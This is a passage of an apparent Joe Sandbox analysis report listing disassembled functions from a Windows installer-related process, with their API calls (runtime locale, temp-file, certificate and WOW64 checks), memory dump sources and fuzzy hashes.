                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,00ADC6DF,?,?,00000000,00ADCCD3,0000003F,?), ref: 00AF70B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                        • String ID:
                                                                        • API String ID: 2040435927-0
                                                                        • Opcode ID: 6dae7cbe74436767421f0cd2559242bb7d717d0bd046d3c72b82af00da21ff4c
                                                                        • Instruction ID: 0f3b8688d37c40578282b9e608974702d186afe29f713ef8fa62ae8621897285
                                                                        • Opcode Fuzzy Hash: 6dae7cbe74436767421f0cd2559242bb7d717d0bd046d3c72b82af00da21ff4c
                                                                        • Instruction Fuzzy Hash: 98519C7290420AABEB209FA4DC45FBF7BA9EF44790F214129FA05A7190DF319D108B60
                                                                        Function 00AD5940 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 389fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetTempFileNameW.KERNEL32(?,URL,00000000,?,B7207CF4,?,00000004), ref: 00AD59AA
                                                                        • LocalFree.KERNEL32(?), ref: 00AD5ABB
                                                                        • MoveFileW.KERNEL32(?,00000000), ref: 00AD5D5B
                                                                        • DeleteFileW.KERNEL32(?), ref: 00AD5DA3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: File$DeleteFreeLocalMoveNameTemp
                                                                        • String ID: URL$url
                                                                        • API String ID: 1622375482-346267919
                                                                        • Opcode ID: 7dca5824a142034ea8e04d93d51f56677eb9a1bb61d4854a4653491093788559
                                                                        • Instruction ID: e523cd69efb788f92faac990b90c0bd571883e6ce6389b3766129e58d99791e2
                                                                        • Opcode Fuzzy Hash: 7dca5824a142034ea8e04d93d51f56677eb9a1bb61d4854a4653491093788559
                                                                        • Instruction Fuzzy Hash: 16025970E146699BCB24DF28CD98BADB7B5BF54304F1042DAD40AA7251EB74ABC4CF90
                                                                        Function 00ADF5E0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 189memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,0000000C,B7207CF4,?,00000000,00000000,?,?,?,?,00000000,00B1B2D1,000000FF,?,00ADEBCA,00000000), ref: 00ADF624
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADF65A
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ADF6BE
                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00ADF77E
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADF832
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 2968629171-1405518554
                                                                        • Opcode ID: 03a6ee4bbc7178ac0bad974f9b64aa6c0c323efc2ee734e336ad83c2ff919c7e
                                                                        • Instruction ID: d4eec54bc95dc9bc0f913f7698ea0f659293910892bd3fce34725603afa4b5ca
                                                                        • Opcode Fuzzy Hash: 03a6ee4bbc7178ac0bad974f9b64aa6c0c323efc2ee734e336ad83c2ff919c7e
                                                                        • Instruction Fuzzy Hash: A9717DB0D01288EEEF11DFA8C9847DEBBF4AF15314F1441AAE415AB381D7B59A04DBA1
                                                                        Function 00ADF3B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 166memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,00000008,B7207CF4,?,00000000,00000000,?,?,?,00000000,00B1B1DD,000000FF,?,00ADED0A,00000000,?), ref: 00ADF3F4
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADF42A
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ADF48E
                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00ADF4FE
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADF5B2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 2968629171-1405518554
                                                                        • Opcode ID: 0d71e64e9b7aadfa5018ce978c8f834b792959ada42e05c5681bee95b72f0d91
                                                                        • Instruction ID: 4ebf4506cc0a72f216b04e73ba37c14ad65d36633ba63cfc9a707f3e10809a5f
                                                                        • Opcode Fuzzy Hash: 0d71e64e9b7aadfa5018ce978c8f834b792959ada42e05c5681bee95b72f0d91
                                                                        • Instruction Fuzzy Hash: E0617EB0D01288EEEF10CFA9DA487DEBBF4AF14314F1441AAE455AB381D7759B04CB61
                                                                        Function 00AF8D30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _ValidateLocalCookies.LIBCMT ref: 00AF8D67
                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00AF8D6F
                                                                        • _ValidateLocalCookies.LIBCMT ref: 00AF8DF8
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00AF8E23
                                                                        • _ValidateLocalCookies.LIBCMT ref: 00AF8E78
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                        • String ID: csm
                                                                        • API String ID: 1170836740-1018135373
                                                                        • Opcode ID: de08907287f7aeb9b9439dc2878629cca7e5b2ace03005ecbf50d87ce30d5f5a
                                                                        • Instruction ID: 7a1051feab6d3de09fc6484c09e5e10dc4dc7d05c0c3f6dd00d6daa7dfd08f2a
                                                                        • Opcode Fuzzy Hash: de08907287f7aeb9b9439dc2878629cca7e5b2ace03005ecbf50d87ce30d5f5a
                                                                        • Instruction Fuzzy Hash: 8741A734A0020CDFCF10DFA8C885AAE7BB6AF45314F148455FA149B392DB35DA01CB91
                                                                        Function 00B0C96B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(00000000,?,00B0CA78,?,?,?,00000000,?,?,00B0CCA2,00000021,FlsSetValue,00B21E00,00B21E08,?), ref: 00B0CA2C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID: api-ms-$ext-ms-
                                                                        • API String ID: 3664257935-537541572
                                                                        • Opcode ID: e77982faeacdd7182243b30b9a09be0334274174f8ef6cb754bc3dcfc201baf6
                                                                        • Instruction ID: 2249179914c16eaab8703bb19b94facf1a5b0aa75f2c68421e9e1a5f53f6e853
                                                                        • Opcode Fuzzy Hash: e77982faeacdd7182243b30b9a09be0334274174f8ef6cb754bc3dcfc201baf6
                                                                        • Instruction Fuzzy Hash: 7A21D832B01215ABC722D7A5AC54B9A3FD8DB557A0F750390ED05B72E0EB30ED01C6A0
                                                                        Function 00AED8F6 Relevance: 9.4, APIs: 6, Instructions: 433COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AED8FD
                                                                        • ctype.LIBCPMT ref: 00AED944
                                                                          • Part of subcall function 00AED458: __Getctype.LIBCPMT ref: 00AED467
                                                                          • Part of subcall function 00AE79C9: __EH_prolog3.LIBCMT ref: 00AE79D0
                                                                          • Part of subcall function 00AE79C9: std::_Lockit::_Lockit.LIBCPMT ref: 00AE79DA
                                                                          • Part of subcall function 00AE79C9: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7A4B
                                                                          • Part of subcall function 00AE7AF3: __EH_prolog3.LIBCMT ref: 00AE7AFA
                                                                          • Part of subcall function 00AE7AF3: std::_Lockit::_Lockit.LIBCPMT ref: 00AE7B04
                                                                          • Part of subcall function 00AE7AF3: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7B75
                                                                          • Part of subcall function 00AE7CB2: __EH_prolog3.LIBCMT ref: 00AE7CB9
                                                                          • Part of subcall function 00AE7CB2: std::_Lockit::_Lockit.LIBCPMT ref: 00AE7CC3
                                                                          • Part of subcall function 00AE7CB2: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7D34
                                                                          • Part of subcall function 00AE7C1D: __EH_prolog3.LIBCMT ref: 00AE7C24
                                                                          • Part of subcall function 00AE7C1D: std::_Lockit::_Lockit.LIBCPMT ref: 00AE7C2E
                                                                          • Part of subcall function 00AE7C1D: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7C9F
                                                                          • Part of subcall function 00AE4403: __EH_prolog3.LIBCMT ref: 00AE440A
                                                                          • Part of subcall function 00AE4403: std::_Lockit::_Lockit.LIBCPMT ref: 00AE4414
                                                                          • Part of subcall function 00AE4403: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE44BB
                                                                        • collate.LIBCPMT ref: 00AEDA78
                                                                        • numpunct.LIBCPMT ref: 00AEDCF2
                                                                          • Part of subcall function 00AE838F: __EH_prolog3.LIBCMT ref: 00AE8396
                                                                          • Part of subcall function 00AE80C5: __EH_prolog3.LIBCMT ref: 00AE80CC
                                                                          • Part of subcall function 00AE80C5: std::_Lockit::_Lockit.LIBCPMT ref: 00AE80D6
                                                                          • Part of subcall function 00AE80C5: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE8147
                                                                          • Part of subcall function 00AE81EF: __EH_prolog3.LIBCMT ref: 00AE81F6
                                                                          • Part of subcall function 00AE81EF: std::_Lockit::_Lockit.LIBCPMT ref: 00AE8200
                                                                          • Part of subcall function 00AE81EF: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE8271
                                                                          • Part of subcall function 00AE4403: Concurrency::cancel_current_task.LIBCPMT ref: 00AE44C6
                                                                          • Part of subcall function 00AE75B6: __EH_prolog3.LIBCMT ref: 00AE75BD
                                                                          • Part of subcall function 00AE75B6: std::_Lockit::_Lockit.LIBCPMT ref: 00AE75C7
                                                                          • Part of subcall function 00AE75B6: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE7638
                                                                        • __Getcoll.LIBCPMT ref: 00AEDAB8
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                          • Part of subcall function 00AD84C0: LocalAlloc.KERNEL32(00000040,00000000,00AF839D,00000000,B7207CF4,?,00000000,?,00000000,?,00B1CB8D,000000FF,?,00AD17D5,00000000,00B1D3BA), ref: 00AD84C6
                                                                        • codecvt.LIBCPMT ref: 00AEDDA3
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$H_prolog3$Lockit::_Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatectypenumpunct
                                                                        • String ID:
                                                                        • API String ID: 613171289-0
                                                                        • Opcode ID: 57a24d5103e952770e2af8a971bc08969255abe7a2ae34bb141a37e5bc13add1
                                                                        • Instruction ID: cb598b18f777bfcc9659dcdeb01038e17b2e355d686953c0cbaa5ceb8fc1887a
                                                                        • Opcode Fuzzy Hash: 57a24d5103e952770e2af8a971bc08969255abe7a2ae34bb141a37e5bc13add1
                                                                        • Instruction Fuzzy Hash: 3BE1F3B19002869FDB11AFA68D026BF7EB9FF45390F25446EF8596B381EF308D109791
                                                                        Function 00AED8F2 Relevance: 9.3, APIs: 6, Instructions: 346COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AED8FD
                                                                        • ctype.LIBCPMT ref: 00AED944
                                                                          • Part of subcall function 00AED458: __Getctype.LIBCPMT ref: 00AED467
                                                                        • collate.LIBCPMT ref: 00AEDA78
                                                                        • __Getcoll.LIBCPMT ref: 00AEDAB8
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADBD10
                                                                          • Part of subcall function 00ADBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBD38
                                                                          • Part of subcall function 00AD84C0: LocalAlloc.KERNEL32(00000040,00000000,00AF839D,00000000,B7207CF4,?,00000000,?,00000000,?,00B1CB8D,000000FF,?,00AD17D5,00000000,00B1D3BA), ref: 00AD84C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$AllocGetcollGetctypeH_prolog3LocalLockit::_Lockit::~_collatectype
                                                                        • String ID:
                                                                        • API String ID: 735909071-0
                                                                        • Opcode ID: 18ad3092a563a5177383fe28207b76f441aa1fb9845e4bdcad55ace4bf523fb8
                                                                        • Instruction ID: faa54a05d644ed33956b572e82424ecf7740f33ab1568009893c8a9be276b350
                                                                        • Opcode Fuzzy Hash: 18ad3092a563a5177383fe28207b76f441aa1fb9845e4bdcad55ace4bf523fb8
                                                                        • Instruction Fuzzy Hash: D6C1D2B190028ADFCB11AFA68D026BF7EB5FF44390F25452EE9596B381EF708900C791
                                                                        Function 00AD2BD0 Relevance: 9.2, APIs: 6, Instructions: 225encryptionCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • #224.MSI(?,00000001,00000000,00000000,00000000), ref: 00AD2C43
                                                                        • LocalFree.KERNEL32(?), ref: 00AD2CA2
                                                                        • LocalFree.KERNEL32(?), ref: 00AD2D0C
                                                                        • CertFreeCertificateContext.CRYPT32(00000000), ref: 00AD2E94
                                                                          • Part of subcall function 00AD3D60: CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 00AD3DA3
                                                                        • LocalFree.KERNEL32(?), ref: 00AD2E13
                                                                        • LocalFree.KERNEL32(?), ref: 00AD2E6B
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Local$Cert$#224CertificateContextNameString
                                                                        • String ID:
                                                                        • API String ID: 2665452496-0
                                                                        • Opcode ID: b048d5c17c0039fd38d184eeeb9ac0e0c1beab54ada5308d34e5b33fb5359939
                                                                        • Instruction ID: 712b069393e2000414ac10c8fa285d8d655338c4837ce565202a53a8c8874149
                                                                        • Opcode Fuzzy Hash: b048d5c17c0039fd38d184eeeb9ac0e0c1beab54ada5308d34e5b33fb5359939
                                                                        • Instruction Fuzzy Hash: 92918E70910249CFDB18CFA8C55879EFBB1FF94304F24861ED456AB391DBB5AA84CB50
                                                                        Function 00ADB500 Relevance: 9.2, APIs: 6, Instructions: 152COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADB52D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADB550
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB578
                                                                        • std::_Facet_Register.LIBCPMT ref: 00ADB5ED
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB617
                                                                        • LocalFree.KERNEL32 ref: 00ADB6C0
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_FreeLocalRegister
                                                                        • String ID:
                                                                        • API String ID: 1378673503-0
                                                                        • Opcode ID: 4fb45ab6e8d45144de4ec08e146f8fb33e8223680707310e61b5e78d68c96065
                                                                        • Instruction ID: f5c941c9108d71ec5d6e4994e5f880ca064f743d4eac62e406df23e7f927e7e8
                                                                        • Opcode Fuzzy Hash: 4fb45ab6e8d45144de4ec08e146f8fb33e8223680707310e61b5e78d68c96065
                                                                        • Instruction Fuzzy Hash: 4C51CE71810659DFCB20DF58E944BAEBBF4FF04324F25465AE822A7390D770AE44CBA0
                                                                        Function 00B05981 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 369COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: __freea$__alloca_probe_16
                                                                        • String ID: a/p$am/pm
                                                                        • API String ID: 3509577899-3206640213
                                                                        • Opcode ID: f3991a1f38b400c86812d129c4e89fac514f5234ab88a77178c055ef191eac47
                                                                        • Instruction ID: 4d9a7880c28b547c7a9e094b0fd9c115149727da32a6e44a4ed2c5402903cefe
                                                                        • Opcode Fuzzy Hash: f3991a1f38b400c86812d129c4e89fac514f5234ab88a77178c055ef191eac47
                                                                        • Instruction Fuzzy Hash: C7C1A031900A159BDB349F68C889ABB7FF4FF05300F2482DAE505ABAD1E6359D41CF61
                                                                        Function 00AFAEF5 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,00AFAEEC,00AF9710,00AF85A3), ref: 00AFAF03
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AFAF11
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AFAF2A
                                                                        • SetLastError.KERNEL32(00000000,00AFAEEC,00AF9710,00AF85A3), ref: 00AFAF7C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastValue___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 3852720340-0
                                                                        • Opcode ID: 892605207cf201b280f52b4c5e7a5c6312e2b3405b3cf6e6ba0b7e568358638f
                                                                        • Instruction ID: add748ae2f56b04c6adfc8c9ddb40e59805c4e5ab0a960b3b6769124f09f0558
                                                                        • Opcode Fuzzy Hash: 892605207cf201b280f52b4c5e7a5c6312e2b3405b3cf6e6ba0b7e568358638f
                                                                        • Instruction Fuzzy Hash: 980124B228D31D6EE62827F6AE85BBB6694DB11BB07300329F3185B0E1EF164E106745
                                                                        Function 00AED38D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Mpunct$GetvalsH_prolog3
                                                                        • String ID: $+xv
                                                                        • API String ID: 2204710431-1686923651
                                                                        • Opcode ID: d778f06cc8b1c65d03d81bab0bf2da3be23c6a838bd36580f4cb194c0bb1f7ef
                                                                        • Instruction ID: 78e5cbac18c146d71fb9af11180ec1f2f0baaabc9c122f880cf2b935761edd23
                                                                        • Opcode Fuzzy Hash: d778f06cc8b1c65d03d81bab0bf2da3be23c6a838bd36580f4cb194c0bb1f7ef
                                                                        • Instruction Fuzzy Hash: E221B0B1904B966EDB21DF75849077BBEF8AB08300B044A5AE199C7A42E734E601CB90
                                                                        Function 00AD83E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(B7207CF4,B7207CF4,?,?,00000000,00B1A221,000000FF), ref: 00AD847B
                                                                          • Part of subcall function 00AF7875: EnterCriticalSection.KERNEL32(00B34AF8,00000000,?,?,00AD25B6,00B3571C,B7207CF4,?,00000000,00B193ED,000000FF,?,00AD1A26), ref: 00AF7880
                                                                          • Part of subcall function 00AF7875: LeaveCriticalSection.KERNEL32(00B34AF8,?,?,00AD25B6,00B3571C,B7207CF4,?,00000000,00B193ED,000000FF,?,00AD1A26,?,?,?,B7207CF4), ref: 00AF78BD
                                                                        • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00AD8440
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00AD8447
                                                                          • Part of subcall function 00AF782B: EnterCriticalSection.KERNEL32(00B34AF8,?,?,00AD2627,00B3571C,00B1CCC0), ref: 00AF7835
                                                                          • Part of subcall function 00AF782B: LeaveCriticalSection.KERNEL32(00B34AF8,?,?,00AD2627,00B3571C,00B1CCC0), ref: 00AF7868
                                                                          • Part of subcall function 00AF782B: RtlWakeAllConditionVariable.NTDLL ref: 00AF78DF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
